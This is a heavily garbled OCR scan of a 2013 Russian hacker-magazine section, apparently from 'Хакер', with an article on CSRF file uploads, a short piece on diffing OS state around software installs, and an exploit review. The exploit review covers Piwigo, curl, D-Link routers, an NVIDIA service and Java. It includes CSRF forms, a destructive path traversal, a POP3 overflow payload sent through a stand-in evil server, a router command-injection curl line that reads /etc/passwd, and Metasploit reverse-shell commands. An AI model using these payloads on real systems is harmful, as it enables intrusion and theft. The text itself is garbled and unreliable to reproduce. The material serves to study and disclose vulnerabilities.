Ассерс-Ьапдиаде : ги-ги, ги; д-0 , В, еп-из; д-0 .5, еп; д-0 . 3 
Ассерс-Епсосііпд: дгір, сіеііасв 

Ассерс-СЬагзег : ѵіп<1оѵз-і25і, иЧ-Ѳ;д-0 .7, *; д-0.7 
Кеер-АІіѵе: ііЗ 

|:опсепс-Туре: гоиІЧрагс/Іопп-сіаса; сЬагзес-ОТГ-8, Ьоипсіагу- 228832 19622 ІОВО 

Сопсепс-ЬепдсЬ: 230 

Огідіп: ассасісег . сот 

Соокіе : ізртдг4=зіг іиз : г и: 763677307 

Ргадгоа: по-сасЬе 

СасЬе-СопсгоІ : по-сасЬе 

228852196221080 

Сопсепс-ОізрозіЫоп: іогго-йаса; пате-"ир1оасІесІ_Іі1е"; іі1епате-"22222. ірд" 

Сопсепс-Туре : арріісасіоп/оссес-зсгеаш 

222222222222222222 

22ѲѲ521962210Ѳ0— 



Рис. 2. Используя ^аѵа8с^ір1, мы сделали аналогичный запрос-загрузку 



нам делать очень страшные вещи. Но для того, что- 
бы понять, что нам нужно для загрузки файла, не- 
обходимо разобраться, чем отличается обычный 
Р08Т-запрос от Р08Т-запроса на загрузку файла. 
Итак, смотрим рис. 1 . 

Это Р08Т-запрос, в котором я выбрал файл 
2222 . ірд для отправки на какой-то сайт. 

Можно заметить несколько важных момен- 
тов. Во-первых, это СотепМуре — "тиШраіІ/ 
^огт-сіаіа", с указанием границ расположения 

вложения — «Ьоипс1агу= 

228852196221080». Во-вторых, само тело запроса, 
которое выделено границами. В нем в заголов- 
ке Сопіепі-Оізрозіііоп: указывается имя поля из 
формочки — црІоас1есІ_ТіІе, а также имя файла в 
Іііепате. Далее идет сам файл. 

Раньше с Р08Т-запросами для нас была про- 
блема в том, что мы не могли влиять на заголовки и 
имели проблемы с бинарщиной. 

Теперь же у нас есть ^аѵа8с^ір1 и мы можем 
полностью сконструировать аналогичный запрос, 
используя ХМШТТРРедиезІ: 



ѵаг 61е0а1:а= '222222222222222222'^ 
51е5І2е = бІеОаТа.Іеп^ІіЬ, 

Ьоипсіагу = " — 

228852196221080'', 



хЬг = пе\л/ ХМІНТТрКеяиезТО; 

хЬг , орел ( '' Р05Т '' д '' ЬТТр : //уісТіт, сот/е 

иріоасі . рЬр"^ Тгие) ; 



хЬг. 5еТКеяие5ТНеас1ег( ''СопТеп1:-Туре'' 
'' т и 1 1: іра гТ / То гт - с1 а Т а , Ьо и п сі а гу =«-• 
"+ЬоипсІагу); 

xИг,5е1і:Ре^ие5ТНеасIег('^СопТепТ-^еп§^^ 
бІеБіге); 



хЬг.ыіТЬСгеЬепТіаІз = "Тгие"; 



уаг Ьосіу = + Ьоипсіапу +"\гЛп"і.. 

Ьосіу += 'СопТепТ-різррзіТіоп:. 
■Рогт-сІаТа; пате=" ир1оасІесІ_61е"; ♦-« 
61 епате=" 22222 .зр§"\г\п ' ^ 

Ьосіу += "СопТепТ-Туре: аррІісаТіоп/*- 
осТе 1 :- 5 І;геат\г\п\г\п"; 



Ьосіу += бІеОаТа "\г\п"; 

Ьосіу += + Ьоипсіагу + 



хЬг, 5 епсІ( Ьосіу); 

Разберем по пунктикам, чтобы не возникало 
вопросов. С первой по третью строки — опреде- 
ление параметров загружаемого файла. В ЯІеОаШ 
могут быть любые данные (включая бинарные), 
далее нужна их длина, а также границы (хотя они 
могут быть произвольными). Следующие две стро- 
ки — стандартное конструирование запроса. Но 
теперь запросы на сторонние хосты разрешены. 

И еще очень важные строки с шестой по 
восьмую. Мы можем добавить произволь- 
ные заголовки, а точнее, интересующие нас 
Сопіепі-Туре и Соп1епМепд!П. Но еще интерес- 
нее — ѵѵіІЬСгесІепІіаІз, которое укажет браузеру до- 
бавить куки или Вазіс-аутентификацию в итоговый 
запрос. Без этого запрос отправлялся бы без кук, а 
это чаще всего лишало бы атаку смысла. 

Далее же идет простая конкатенация данных, 
в аналогичной обычному запросу последователь- 
ности. И наконец, отправка данных жертве. Все 
просто. Итог смотри на рис. 2. Теперь о плюсах, 
минусах и тонкостях. 

Как я уже сказал, разработчики всегда верили в 
неприкасаемость загрузки файлов, а потому защи- 
ту от С8РР на нее не ставили. Скорее даже наобо- 
рот, считали, что необходимость загрузки файла 
может защитить всю формочку. А потому на этом 
«погорели» и всякие сайты типа РасеЬоок и РІіскг, и 
различные ^аѵа-серверы типа ТоппсаТа. На самом 
деле есть еще где и что покопать. 

Минус у техники теперь один — если есть защи- 
та от С8ВР, то ее надо как-то обходить. 

Ну и не могу не поблагодарить «автора» сей 
техники — знаменитого Кшиштофа Котовича 
(Кг 2 уз 2 Іо^ КОІОѴѴІС 2 ). Спасибо! Примеры атаки мож- 
но потрогать на его же сайте — ооо.аІ/Цд ІОт. 



ОТСЛЕДИТЬ ИЗМЕНЕНИЯ В ОС 



РЕШЕНИЕ 

В прошлом номере я писал про применение тул- 
зенок из набора Вузіпіегпаіз для выявления все- 
возможных конфигурационных уязвимостей в 
ОС, которые возникают после кривости админов 
или из-за уязвимостей устанавливаемого ПО. 
Но приведенные примеры касались всей ОС в 
общем — то есть мы ее всю целиком смотрим и 
стараемся выискать, что же страшного и как мы 
можем наделать. Но если с правами на папки, на 
файлы еще можно как-то быстро разобраться, 
понять и выделить векторы атаки, то с каким-ни- 
будь реестром это уже не прокатит. Очень уж там 
много всякого мусора. Особенно это относится к 
поиску уязвимых конфигов. Веток, доступных для 
чтения, — масса, а просмотреть все и выделить 
критичные нереально. Точнее, реально, но это 
мартышкин труд. Так что же делать? Ну, во-первых, 
конкретизировать свои желания и не копать все 
ОС в целом, а сосредоточиться на определенном 
стороннем ПО. Здесь нам в помощь те же тулзы 
из 8узіп!егпаІз. А во-вторых, дабы еще уменьшить 
скоуп работы, можно исходить не из поиска дан- 
ных, а из тех изменений, которая сделала програм- 
ма при своей установке в ОС. 

Добиться этого можно так: делаем снимок 
ОС перед установкой ПО, а потом — снимок по- 
сле установки. После чего все, что нам необхо- 



димо, — сравнить эти снимки. Все, в общем-то, 
просто. 

Тулз, которые позволяют сделать это, достаточ- 
но. Этот функционал есть во многих «продвинутых» 
анинсталлерах. Но не ведись на рекламу! Для нас 
их функционал мал, так как они в массе своей от- 
слеживают только изменения в файловой системе 
и реестре, причем только появление чего-то ново- 
го, а не изменения существующего. 

Так что для наших целей нам нужна специаль- 
но обученная собака. И имя ей — АПаск 8иііасе 
Апа1у2ег ( аоо.оІ/ОіЬВѴѴ ). Странно, но продукт 
сей — дите МісгозоЛ’а. Вероятно, его доброй 
и честной части :). А потому хорош и глубок. Вот 
список мониторинга: 

біез 

ге§і зТ гу кеу 5 

тетогу іп-РогтаТіоп 

ціпсіоѵуз 

ИІПСІОМ5 6ге\л/а11 

САС АззетЬИез 

п е Тѵу о г к зЬагез 

1о§оп зеззіопз 

рогТз 

патесі рірез 

аиТогип Тазкз 

РРС епсІроіпТз 



ргрсеззез 

ТЬгеасІз 




сІезкТорз 




Ііапріез 





С точки зрения практической использование 
просто. Для начала ставим всякие сторонние шту- 
ки, которые могут потребоваться для ПО (типа 
базы данных), чтобы изменения, внесенные от 
третьих программ, не мешались. Делаем Ьазеііпе- 
скриншот системы. После чего устанавливаем 
ПО и делаем ргобисі-скриншот. Далее запускаем 
сравнение — и все :). 

Ну и конечно, анализ лучше всего производить 
на виртуальном чистом сервачке или хотя бы при 
отключенных сторонних программах. 

В конце еще хотелось бы добавить одну мысль. 
Как это ни странно, но опыт показывает, что кон- 
фигурационные уязвимости встречаются систе- 
матически и искать их достаточно просто. Так что 
для личного фана и лучшего понимания модели 
безопасности винды советую тебе поискать такие 
баги. Успех почти гарантирован! 

Ну вот и все. Надеюсь, что было интересно :). 
Если есть пожелания по разделу Базу Наск или 
есть охота поресерчить — пиши на ящик. Всегда 
рад:). 

И успешных познаний нового! ЗС 
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ОБЗОР . 
ЭКСПЛОИТОВ 



Роутеры в опасности! Этот 
месяц богат на эксплойты для 
различных роутеров, в част- 
ности из-за отсутствия реак- 
ции вендоров на обращения 
исследователей. Ну и уже по 
традиции — О-бау в баѵа. 



ѴѴАІШШС 



Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. Ни 
редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 



▼ 

Борис Рютин, Ц0Р(Е5аде ІаЬ) 

СикеЬагтап@хакер.гц 

@с1и_кеЬа.гтап 



АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



РІѴѴІСО — МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 



с функцией рИріпТоО: и будет доступен по адресу Іі«р://[ТАР0ЕТ_Н08Т]/ 
^іІе.рИр. 



СѴ88ѵ2: 

Дата релиза: 
Автор: 

СѴЕ: 

СѴЕ: 



7.6 (АѴ:М/АС:Н/Аи:М/С:С/І:С/А:С) 
27 февраля 2013 года 
Нідіі-Тесіі Вгісіде ЗА 
2013-1468 
2013-1469 



Исследователями из НідИ-ТесИ Вгісіде ЗА были обнаружены уязвимости 
типа СЗРР (Сго85-ЗіІе Ведиезі Рогдегу) и РаІН ТгаѵегзаІ в Ріѵѵідо версии 2.4.6. 
Ріѵѵідо — это ореп зоигсе скрипт фотогалереи, пользующейся популярностью 
среди как начинающих, так и продвинутых фотографов. Причем в каждой уяз- 
вимости есть свои нюансы. 



ЕXР^ОIТ. Первая уязвимость СЗРР существует из-за отсутствия проверки 
прав в скрипте /асітіп.ріпр при редактировании файлов с помощью плагина 
ЬосаІРіІез Есіііог. Несмотря на то что по умолчанию он выключен, все равно 
вектор атаки реален, так как входит в стандартную поставку и не все использу- 
ют РТР- протокол для редактирования. 

Для успешной атаки надо всего лишь помочь залогиненному админу зай- 
ти на нашу специальную страничку, которая создаст выполняемый скрипт 
на уязвимом сервере. Например, следующий код создаст скрипт ІіІе.рНр 



<Тогпі асТіоп='^Ь'!:Тр://[ТАКеЕТ_Н05ТІ/а(:1тіп 

ріи^іп - Іос а 1 Р ііез Есі теТЬрсІ= " розі: пате= "'Рі " > 

<іпри1 ■Ьуре="ИісІсІеп" пате='есІі1:есІ_Рі1е’ уа1ие=’61е.рІір' > 

<іпрц1: 1:уре=’!.ІііМеп^^^^ рЬріп-Ро()х...'.> 

<іпри1: 1:уре=''Ь1фс1еп'\ паш^ЛзиЬтіІ: 

< і п р и-Ь -Ьу ре= " 5 и Ьті1: " 1(1= " ЬТ п "> 

</-Рогт> 

<5СгірТ> 

сІоситепІ.ТІ.зиЬтіТХ}.; 

</5сгір1:> 

Вторая уязвимость типа раііп ІгаѵегзаІ (раскрытие путей) имеет деструк- 
тивный характер. Мы узнаём содержимое файла, но при этом его удаляем. 
Сама уязвимость находится в файле іпзІаІІ.рИр и заключается в недостаточ- 
ной проверке (ЗЕТ- параметра сІІ: 

іт XI (ОЕіГ'іІІЦ) М 61е_.ехі5І 

$сопТ{ 'сІа1а_1оса^іоп']. ' рѵі /^ ' .$_СЕТ[ 'сІІ' 1)} 

{ - 

$61епате = РНРЫ6 КОРТ РАТН.$согѵР[ ' сІа1:а ІосаТіоп ' ] . ' р щ ' 
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Взлом 

Обзор эксплойтов 



^5 



$_СЕТ[-аГ]; 

есЬо Я1е_§е-1:_согг^еп1:5 ( $Л1епате ) ; 

___ІИ 



Например, для того, чтобы узнать настройки подключения к БД, обратим- 
ся по следующему адресу: 

И11:р;//{ТАКСЕТ_.Н05Т]/іп5Ш1,рІір?аі=/.,У,^.^ 

сІаІаЬаве.іпс.рЬр 

Но не забываем, что при этом файл удалится, и сайт перестанет работать. 
Уязвимость тестировалась на ѴѴіпсІоѵѵз 7, РНР 5.3+. 

ТАНСЕТ8. Ріѵѵідо2 .4.6 и, возможно, предыдущие версии. 

ЗОіиТІОМ. Обновиться до 2.4.7. 



ПЕРЕПОЛНЕНИЕ БУФЕРА В СПКІ 



СѴ88ѵ2 
Дата релиза: 
Автор: 

СѴЕ: 



10 (АѴ:Р/АС:1/Аи:М/С:С/І:С/А:С) 
6 февраля 2013 года 
Ѵоіета 
2013-0249 



В функциях обработки РОРЗ-, 8МТР-протоколов была найдена удален- 
но эксплуатируемая уязвимость, которая может привести к выполнению 
произвольного кода. Так как исходники программы хранятся на ОіШиЬ, 
то мы без проблем можем посмотреть на патч, исправляющий эту ощибку: 
ЬіІ.Іѵ/ІгѵИзМ . Видно, что использовались небезопасные функции по рабо- 
те со строками: зігсаі и зігсру, без соответствующих проверок. В момент, 
когда происходит аутентификация 8А51 0ІСЕ8Т-М05, функция Сиг1_заз1_ 
сгеа1е_сІідез1_тс15_теззаде() использует данные, пришедшие от сервера, 
не проверив их длину. Далее эти данные добавляются к буферу фиксиро- 
ванного размера. 

ЕХРЬОІТ . Эксплуатация возможна при обращении к почтовым серверам, 
но можно использовать маленькую хитрость и выполнить это через веб. Дела- 
ем НТТР-запрос на наш сервер: 

СЕТ / НТТР/1.0 

Нозі:; еуіІзегуеГѵСрт 



который вернет редирект на почтовый сервер через Іосаііоп: 

НТТР/1.0 302 Роипа 

ІосаТіоп: рорЗ://х:х@еуіХ5егуег.сот/, 

СУРЕ обработает редирект и подсоединится к еѵіізегѵег.сот на порт 110, 
используя РОРЗ-протокол. Ответ сервера при этом должен быть: 

+0К РОРЗ зегѵег геасіу 

Ответ сУРІ: 



САРА 



Сервер отвечает с помощью механизма 0КЗЕ8Т-М05: 

+0К ІІ5І о-Р сараЬіІіТіез -РоИомз 

5А51 0І6Е5Т-М05 

} ІМРІЕМЕМТАТІОМ сІитЬусіитЬ РОРЗ зегѵег 
Поэтому ІіЬсигІ отвечает соответственно: 

АУТН 0ІСЕ5Т-М05 



И теперь высылаем полезную нагрузку: 

+ с туи Ь(509 1 к р воо р в^^ р в^^ р в^^ р в^^ р в^^ р в^^ р вдо р в^^ р вду р вдо р вду*-^ 
рвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвду*- 
рвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвдурвду-^ 

РВІіхиЬ25з2Т0іТ0Е2ТУс5аЕѴКК20уаСбіІ-НРѵсО0іѴХѴ0аСІ5У1лІхпЬЗЗрас*- 
Иі:Р1лІ1кН5І22ХМ2ІСНоѴХ322Хд9сІХВтІТе= 



Возможно, ты заметил что-то знакомое в коде. Это Ьазе64 следующего 
запроса: 

геа1т="ААААААААААААААААААААААААААААААААААААААААААААААААААААА«-< 

аааааааааааааааааааааааааааааааааааааааааааааааааааааааааааа^-^ 

ААААААААААААААА" ^ попсе="0А6МС91;Едет2ИЬ" , ^0Р=^^ацТИ'\а12ОГІТИт^ 
=тс;I5-5е55^сИаг5еТ=иТ■Р-^ 

Переполнение буфера возникает из-за того, что размер буфера "УНІ" — 
128 и размер параметра геаіт также 128. В СЮВ наша ошибка выглядит сле- 
дующим образом: 

Рго§гат гесеіѵесі зі^па! 5ІС5ЕСУ, 5е§теп1:а1:іоп -РаиИ:, 

0х000071^с12Ь238298с1 іп ?? () -ргот /1іЬ/х8б_64-1іпих-§пи/е 

ІіЬс.30.6 

(бсІЬ) Ы; 

#0 0х00007-РсІ2Ь238298сІ іп ?? () -Ргот /1іЬ/х86_б4-1іпих-§пи/«-' 

ІіЬс.30.6 

#1 0Х00007-РСІ 2Ь2а 5 с С07 іп Си г1_з а з 1_сгеаіе_с1 і^ез'Ь^тсІ 

тезза^е () 

■Ргот /Иоте/кургІ2е1/іезі/сиг1-7,28,1/1іЬ/,1іЬз/1іЬсиг1,е 
50.4 

#2 0x4141414141414141 ір ??. () 



#1469 0x4141414141414141 іп ?? () 

#1470 0х656с1616е72657375 іп ?? () 

Саппов ассезз тетогу а-1; асісігезз 0х7-р-р-Р63Ь8Ь000 

Исходник сплоита можно найти в блоге автора: Ьі1.Іѵ/2оОгѵР . 

ТАНСЕТ8. СУРІ/ІіЬсигІ версии с 7.26. 0 до 7.28. 1 . 

80ЬиТІ0М. Рекомендуется отключить все протоколы, кроме НТТР(8), 
в приложениях, использующих СУ Р10РТ_РР0Т0С018 и СУРІОРТ_РЕОІР. 
РРОТОСОС8, или установить версию 7.29.0 или выше. 



МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
в РОУТЕРАХ 0-иНК ОІН-600 и ОІЯ-300 (ВЕѴ В) 



СѴ88ѵ2: 

Дата релиза: 
Автор: 

СѴЕ: 



М/А 

4 февраля 2013 года 

т-1-к-З 

М/А 



Автор эксплойта ждал почти два месяца с момента обнаружения уязвимо- 
сти и уведомления вендора, но так и не получил ответа. Поэтому решено было 
выложить все наработки в паблик. 

ЕХРІОІТ. Уязвимость существует из-за отсутствия какограничения, так и про- 
верки входящего параметра стУ, что позволяет выполнить любой код неавтори- 
зованному пользователю. Можно даже не использовать эксплойт 1337сІаѵ.сот/ 
ехрІоіі/20327 . а просто запустить из командной строки в любом Упих: 




Получение шелла на роутере 0-Ыпк 




в6 



ХАКЕР 04/171/2013 



Лр 13034 0.0 0.4 10416 1944 ?? К 10:48РМ 0:00.96 ЛрО: сх5€С.огд апопутоив/апопутоиз (ЛрО) 

Лр 13035 0.0 0.4 10416 1944 ?? Я 10:48РМ 0:00.89 ЛрР: схзес.огд апопутоиз/апопутоиз (Лр«і) 

13036 0.0 0.4 10416 1944 ?? Л 10:48РМ 0:00.73 Лрр: схзес.огд апопутоиз/апопутоиз (ЛрО) 
Лр 13046 0.0 0.4 10416 1952 ?? Я 10:48РМ 0:00.41 ПрсІ: схзес.огд апопутоиз/апопутоиз (ЛрО) 

Лр 13047 0.0 0.4 10416 1960 ?? Я 10:48РМ 0:00.42 ЛрО: схзес.огд апопутоиз/апопутоиз (ЛрО) 

ГООІ 13219 0.0 0.3 10032 1424 ?? Я 10:52РМ 0:00.00 /изг/ІІЬехес/ЛрР -сЮА 

гоое 13225 0.0 0.3 10032 1428 ?? Я 10:52РМ 0:00.00 /изг/ІіЬехес/ЛрР -сЮА 

ГООІ 13409 0.0 0.3 10032 1404 ?? Я 10:53РМ 0:00.00 /изг/ІІЬехес/ЛрР -РОА 

гооі 13410 0.0 0.3 10032 1404 ?? Я 10:53РМ 0:00.00 /изг/НЬехес/Лрб -РОА 



ѵрк: 

Яр 1336 100.0 0.5 10416 2360 ?? Я 11:15РМ 600:39.95 ЯрР: 127.0.0.1: апопутои*/апопутои$@сх*всигі1у.сот;| 

\г\п (ЛрР)З 

фЮр- 

1336 гоеі 1 103 О 104 16К 2360К ЯЦЫ 600:53 100.00% ПрР 



Результат работы эксплойта для фряшного РТРсі 



сигі --сіа1:а "стсі=са1: /ѵаг/ра55ѵ^^^ ІтІ;1:р://<Таг§е1: ІР>/^ 

соштапсі.ріір 

А так как в некоторых версиях устройства пароль администратора хра- 
нится обычным текстом, то получить права администратора атакующему 
не составит труда. Также в интернете можно найти эксплойты от этого автора 
для других моделей устройств О-Ыпк, а также для железок других вендоров, 
например ТР-ЫМК: із.об/ОВІЬѵС . 

ТАЯСЕТ8 

ОІН-300: Версия прошивки: 2.12— 18.01.2012; 2.13 — 07.11.2012 
ОІР-600: Версия прошивки; 2. 12602 — 17.01 .2012; 2.13601—07.11.2012; 
2.14601—22.01.2013 

80іиТІ0М . Патна от разработчика пока не поступало. 



МѴЮІА 01$РШ ОКІѴЕК 8ЕКѴІСЕ (Н$ѴЮ ЕХР10ІТ 



СѴ88ѵ2: 

Дата релиза: 
Автор: 

СѴЕ: 



М/А 

25 декабря 2012 года 

@ре1егѵѵіп1г8ті16 

М/А 



Неплохой подарок к Новому году как раз после «конца света» сделал поль- 
зователь Ре1ег\л/іп1г8гпі16, который нашел уязвимость в... видеодрайвере. Да 
еще и опубликовал исходники на разіебіп до патча вендора, который смог за- 
крыть уязвимость только в январе этого года. 

ЕXР^ОIТ. Уязвимость стара как мир — переполнение буфера — и находится 
в службе МѴЮІА Оізріау Огіѵег Зегѵісе, прослушивающей именованный канал 
(патесі ріре)\ріре\п8ѵг, который сконфигурирован с флагом МІІ610АС6, 
что позволяет обращаться к нему любому пользователю\Л/іпсІоіл/8-системы. 

А переполнение буфера, в свою очередь, возникает в результате неправиль- 
ного переноса данных с помощью функции теттоѵе. 

Сам эксплойт написан в олдскульном стиле на С++, и для его запуска при- 
дется обратиться к компилятору. Для удачной атаки потребуется локальный/ 
доменный доступ к машине. По умолчанию полезная нагрузка создает нового 
пользователя гООІ с паролем гООЮОг. 

Исходники эксплойта — із.осІ/М^цРВ І. 

ТАПСЕТ8.ДО310.90. 

80ШТІ0Ы . Доступно обновление с исправлением данной ошибки от произ- 
водителя. 



ІАѴААРРІЕТІМХ НЕМОТЕ 
СООЕ ЕХЕСОТЮМ О-ОАУ 



СѴ88ѵ2 
Дата релиза: 
Автор: 

СѴЕ: 



9.3 (АѴ:В/АС:М/Аи:М/С:С/І:С/А:С) 
10 января 2013 года 
неизвестен 
2013-0422 



Первоначально исходники эксплойта ( і8.д6/ШЦ5РЦ были выложены 
на сервисе разіебіп со ссылкой на форум батадеіаб и пометкой «Ргот 
Ри88іа ѴѴІ16 Іоѵе». Уже на следующий день появился полноценный модуль 
для Меіазріоіі. Данная уязвимость использовалась всеми популярными экс- 
плойт-паками еще до того, как был выпущен соответствующий патч. В связи 



с большим количеством атак на Заѵа, в интернете появилось много статей, 
как описывающих отключение Заѵа-плагинов в своих браузерах, так и про- 
сто призывающих к этому. Уязвимость существует в методе сот.8ип.]тх. 
т6еап8егѵег.МВеапІпзіапІіаІог.1іпсІСІа88 Заѵа-апплета и дает возможность 
обойти песочницу и запустить произвольный Заѵа-код, так как сам метод по- 
зволяет получить ссылки на любой класс. 

ЕХРиОІТ. Эксплуатация с помощью Меіазріоіі не составляет труда и содер- 
жит полезную нагрузку для всех популярных ОС: ѴѴІПСІОѴѴ8, Ыпих, 08 X. 

тз-Р > изе ехр1оі1:/ти11;і/Ьгоѵу5егУзаѵа_дге17_ІшхЬеап 

Ш5-Р ехр1оі1:(заѵа_зге17_зтхЬеап) > зеі; ТАКСЕТ 1 

тз-Р ехр1оі1;(заѵа_зге17_.зтхЬеап) > зеі: РАУІОАО ѵ\/іпсІомз/*-' 

те1;егрге'^ег/геѵегзе_1:ср 

тз-Р ехр1оі‘1:(заѵа__зге17_зтхЬеап) > зе-1: ІН05Т 192.168.24.141 
тз-Р ехр1оі-^(заѵа_Лге17_зтхЬеап) > ехріоіі; 

Более подробно про уязвимость можно прочитать в ѵѵбііерарег от Іттипі^: 
6і1.Іѵ/исІ1ѵа2 . 

ТАРСЕТ8.3аѵа7их-7и10 включительно. 

80ЬиТІ0Н . Доступно обновление с исправлением данной ошибки от произ- 
водителя. 



УДАЛЕННОЕ ВЫПОЛНЕНИЕ КОДА В ІАѴА 
АРРІЕТ МЕТНОО НАНОІЕ 



СѴ88ѵ2 
Дата релиза: 
Автор: 

СѴЕ: 



10 {АѴ:Р/АС:1/Аи:М/С:С/І:С/А:С) 
24 января 2013 года 
неизвестен 
2012-5088 



Уязвимость существует в функции іаѵа.Іапд.іпѵоке.Ме^бобНапсІІе. 
іпѵокеѴѴіШАгдитепІз. При создании сплоита мы делаем из нее «оберт- 
ку» для метода іпѵокеЕхасІ, который поддерживается тем же классом — 
МеІбосІНапсІІе. 



р.иЬИс ОЬзес'Ь іпѵркеМі1^ЬАг2цтеп'Ьз(06дес1: аг§итеп1:з) 

•Ьбгомз ТбгомаЫе { 

ІПІ : агдс = аг2итеп1:з == пиіі ? 0 : агё;итеп1:з. 1еп§1:Іі; 

Ме1:6ос1Туре 1:уре = 1уре()з 

(1;уре.рагате1:егСоип1;() != аг§с || ^ 

ізѴагагбзСоІІесІогО) { 

/_/ Симулируем іпурке 

геііигп азТуре(Ме1:6рсІТуре.§епегісМе1:6рсІТуре(агбс)) ,.е 

іпѵркеІлІіІібАг&итепІз (аг^итеп1:з ) ; 

} - - 

МеІіЬрсІНапсІІе іпѵркег = Іуре.іпѵркегзО .ѵагаг§зІпѵокег() ; 
ге1:игп іпѵркег. іпѵокеЕxас1:(1:6із^ аг^итеп'^з); 





Судя по документу біМѵ/ХѵкІѵѵТ . это позволяет обойти проверку безопас- 
ности, определенную при прямом вызове. Это можно использовать для огра- 
ниченного списка классов, например как здесь: 

МеібосІНапсІІез. Іоокир Іосаііоокир = МеІібосІНапсІІез 
риЫісІоокирО ; 



МеіЬосІТуре ІосаІМеіИосІТуреѲ = Ме1:6осІТуре.те1;ЬосІТуре(С1азз.е 
сіазз^ 5-^гіпе. с1аз 5); 

МеібосІНапсІІе ІосаІМеіИосІНапсІІеѲ = Іосаііоокир. 6псІ51:а1:іс*-' 
(С1а55 . сз^аз.з^ ''-рргМате"^ ІосаІМеіИрсІТуреѲ)^ _ 

Сіазз ІРсаІСІаззІ = (С1азз)1оса1Ме1:6осІНапсІ1е0.4-' 
іПУРкеІАІііЬАгеитепІізСпеМ- -0Ьзесі[ ] { "зип ѵРГ§.то 2 .і 11 а г«-‘ 
Заѵазсгірі.іг)1:егпа1.Сопіех1:" }); 



Сіазз 1оса1СІазз2 = (Сіазз )1рса1Меі6осіНапсі1е^^^ 

іпѵоке1лІі1:6Аг§итеп1І:5(пеѵѵ 0Ьзес1:{1 { "5ип.рг§.^ш 

зауазсгірі: . іпіегпаі .СепегаіесІСІаззІоасіег" }) ; 

Рассмотрим проверку безопасности в методе СІа88.ТогМате{); 
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Взлом 

Обзор эксплой то в 



«7 



ѴОІ.Л сЬсс>с8«сиг1СуМ«п«9*г (С1а*а<7> г*Гс, МстЬсгМапе ів) < 
ЗвсигіЬуМвпадег вя»дг - Яуагот.доі.50сиеіеуМлпвдвг{) і 
іі (ашфг »• пиіі) г«(игп; 
і« (аІІомесІМосіев — ТПОВТЕО) гаЪит; 

-.(■•р ! : 

атдг . еЬаскМвтЬагАссваа (гвГс, МатЬаг . РУВЬ/О ; 



С1аз8<?> саІІагСіава - ( (а11о«юсІМск1ва « РЯІѴАТЕ) !- О 

7 ІоокирСІаяз іоі асгопр .іг- -і тосі« 
/ • -. л маі Ч тле.. с; і'. : 

вЯ»еО»Л»гСіа»*АСГпегуРоіп*: (Ьги*) Ш 
іо^гХвЛлеваеоі^'ІХЪекирОІмя, *»Г(йТ I I 

^ ' 1МПЦТ~^ ІІГм ~~>'-Г'ПТТі 



> *хсга стіаск 



(саІІагСІазз 



апн}г .сАсскРаскадеАссеаз (ѴегіСуАссвза . двсРаскадаМапасгеСс) I / 



(Я). ІаРиЫісО ) гакигп; 

С1ааз<?> Деге - ш.декОасІагІпдСІаза ( I ; 

в»дг.сАвскмвтЬвгАсс*зв(е»вес, тпЬлі . ОЕСІАЯВОі > ^:ТАС- «Аі-К НЕВЕ 

' гар А: 

1Е (сіаСс !- геГе) 

згадг .сАаскРаскадаАссааа {ѴвгіГуАссвзз.^аеРаскадвИаиівісівГс) ) і 



Разбор функции сИескЗесигіІуМападег, желтым выделены ключевые моменты 




К«р : /яаіавріоі г . рга 



, »[ «атааріон ѵ4.б.0-<»«ѵ 1е«г«;4.в »рі:і.0І 

Г» .. --■[ 1085 •хріоіта • 591 аихкііагу • 175 роа( 
«С 275 р 4 уІоа<І 4 • 29 4 Псой*гі - в пера 
•( аѵп ГІ 5511 иоііагаі) <оа«у (гоіэ.ез.05 




Использование эксплойта иаѵа Арріеі МеІЬосІ Напбіе 



риЬІіс. 5.ШІС С1а5$< сІазБМате) 

1:Игоѵ\;5 СІаззМо'ЬРоипсІЕхсерІііоп { 

геіі.игп ■Ро^Nате0 ( с1а55Nате^ і;.гие ^ Сіазз 

ёе1:Са11егС1а55ІоасІег ( ) ) ; 

1- 



Метод ТогМате вызывает СІаззЕоасІег.деІСаІІегСІаззІоасІегО для по- 
лучения іпѵокег СІаззЕоасІег и использует его, чтобы переопределить 
текущий класс. СеЮаІІегСІаззЕоасІег пытается получить вызывающего. 
Но так как наш метод «в обертке», то РеЯесІіоп.деЮаІІегСІазз(З) увидит 
іпѵокеШИАгдитепіО как вызывающий, и деЮаІІегСІаззІоабег будет ис- 
пользовать загрузчик для МеІ^іобНапРІе. Это позволяет получить ссылки 
на определенные классы: зип.огд.тогіІІа.іаѵазсгірипІегпаІ.СопІехІ и зип.огд. 
то2іІІа.]аѵазсгірііп1егпаІ.СепегаІебСІаззЕоабег. После этого воспользуемся 
рекурсивной технологией из эксплойта СѴЕ-2013-0422, которая расписана 
в уже упомянутом документе от Іттипііу (ЫЦу/ЦРІуа2). Это работает, по- 
скольку новая РеІІесІіоп АРІ также определяется в момент вызова при по- 
лучении МеІИосІНапсІІе. Например, мы проверяем метод МеІІіосІНапсІІез. 
Іоокир.ЯпсІѴіг1иаІ(): 



ѵріа сЬеск5есигі1:уМапаёег(С1а55<?> ге-Рс^ МетЬегNате т) { 
5есигі-1:уМапа§ег зш^г = 5уз1;ет.§е1:5есигі1:уМапаеег(У;.._. 



-і'Р (5т§г == пиіі) хеШеп; 

.іі....(а11омесІМосІе5 == ТКІІ5ТЕ0) .геХигпі 

зт§г . сМескМетЬегАссезз ( ге-Рс ^ МетЬег у ривіІС) ; 

С1а55<?> саІІегСІазз = ((аііомеамосіез & РКІѴАТЕ) != 0 

? ІоокирСІазз 

ёе"С С а 1 1е гС І а з з А1: Е п 1: гу Ро і п'І:^ 

С^гие)); 

Іі: ...СіѴегіІ^уАссезз . сІаззІоасІегІзАпсезІіог*-' 

(ІоокирСІазз, ге-Рс) 1 1 

(саІІегСІазз != ІрокирСІазз М 

! Ѵегі-РуАссезз . с1аззІоасІегІзАпсез1;ог4-і 

(саІІегСІазз, ге-Рс)». 

зш^г . сИескРаска§еАссез5(Ѵегі-РуАссезз .«-« 
ее'^РасІ<а2еМате(ге-Рс)); 



Такая технология окончательно отключает Эесигі^ Мападег, как и в пре- 
дыдущем случае. 

МеТИосІТуре ІосаІМеТИосІТуреІ = МеТІіосІТуре.теІИосІТуре^-' 

